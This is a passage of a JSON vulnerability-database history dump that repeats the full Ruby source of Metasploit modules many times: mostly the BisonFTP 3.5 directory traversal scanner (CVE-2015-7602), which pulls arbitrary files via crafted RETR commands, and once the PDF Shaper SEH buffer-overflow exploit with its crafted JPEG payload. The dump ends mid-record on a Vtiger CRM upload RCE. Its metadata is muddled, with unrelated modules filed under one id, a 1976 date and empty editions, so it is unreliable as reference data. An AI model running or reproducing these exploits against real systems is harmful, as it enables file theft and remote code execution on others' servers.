message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-24T18:30:59", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-30T08:46:32", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-30T08:46:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-30T08:46:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-30T08:46:32", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-30T12:37:18", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-30T12:37:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-30T12:37:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-30T12:37:18", "differentElements": ["sourceData"], "edition": 85}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-02T20:42:29", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-02T20:42:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-02T20:42:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T20:42:29", "differentElements": ["sourceData"], "edition": 86}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-02T22:34:26", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-02T22:34:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-02T22:34:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T22:34:26", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 87}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. 
This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T20:26:50", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-03T20:26:50"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310142841", "OPENVAS:1361412562310142840", "OPENVAS:1361412562310142842", "OPENVAS:1361412562310113490", "OPENVAS:1361412562310142831", "OPENVAS:1361412562310113488", "OPENVAS:1361412562310113487", "OPENVAS:1361412562310113489", "OPENVAS:1361412562310142830", "OPENVAS:1361412562310113486"]}, {"type": "exploitdb", "idList": ["EDB-ID:47349", "EDB-ID:47347"]}, {"type": "redhat", "idList": ["RHSA-2019:2593"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154304"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "cve", "idList": ["CVE-2019-12753"]}], "modified": "2019-09-03T20:26:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. 
This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << \"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << 
\"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T20:26:50", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 88}, {"bulletin": {"id": 
"MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-03T22:33:32", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-03T22:33:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-03T22:33:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T22:33:32", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 89}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f56406218e2820490bbc2482df3669ed", "type": "metasploit", "bulletinFamily": "exploit", "title": "Vtiger CRM - Authenticated Logo Upload RCE", "description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. 
